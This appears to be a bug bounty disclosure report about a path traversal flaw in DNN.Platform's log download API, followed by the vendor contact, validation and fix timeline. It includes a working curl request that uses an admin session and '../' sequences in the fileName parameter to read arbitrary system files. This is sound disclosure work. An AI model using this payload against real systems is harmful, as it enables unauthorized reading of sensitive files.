Path traversal on administrative account in dnnsoftware/dnn.platform

Valid

Reported on

Aug 9th 2022

Description

Relative path traversal in DNN.Platform at log download functionality. Administrative account can download any system file. This could allow direct read access to files that are not meant to be accessible directly by the platform.

Proof of Concept

Login as administrative user. Payload tested on DNN 9.1.1

curl -i -s -k -X $'GET' \
    -H $'Host: <HOST>' \
    -b $'.DOTNETNUKE=<ADMIN_SESSION>' \
    $'https://<HOST>/<PATH_TO_DNN>/API/PersonaBar/ServerSettingsLogs/GetLogFile?fileName=../../../../../../Windows/win.ini'

Replace the <HOST>, <ADMIN_SESSION> and <PATH_TO_DNN> with the appropriate values. <PATH_TO_DNN> may include the language selection. Other files than Windows/win.ini may be leaked, such as windows/system32/drivers/etc/hosts. Adjust the number of "../" depending on the local configuration.

Impact

Arbitrary file read. This could leak sensitive system files or any file present on the system.

Occurrences

Path.Combine without checks on sensitive characters such as "." Exploit was confirmed on a deployment of DNN 9.1.1.

Path.Combine without checks on sensitive characters such as "." Exploit was confirmed on a deployment of DNN 9.1.1.

We are processing your report and will contact the dnnsoftware/dnn.platform team within 24 hours. a year ago
We have contacted a member of the dnnsoftware/dnn.platform team and are waiting to hear back a year ago
We have sent a follow up to the dnnsoftware/dnn.platform team. We will try again in 7 days. a year ago
We have sent a second follow up to the dnnsoftware/dnn.platform team. We will try again in 10 days. a year ago
Mitchel Sellers validated this vulnerability a year ago
Ephvuln has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the dnnsoftware/dnn.platform team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the dnnsoftware/dnn.platform team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the dnnsoftware/dnn.platform team. This report is now considered stale. a year ago
Ephvuln
a year ago

Researcher

Requesting for publication. @admin

Mitchel Sellers
a year ago

Maintainer

We are publishing now!

Mitchel Sellers marked this as fixed in 9.11.0 with commit 9b1735 a year ago
Mitchel Sellers has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation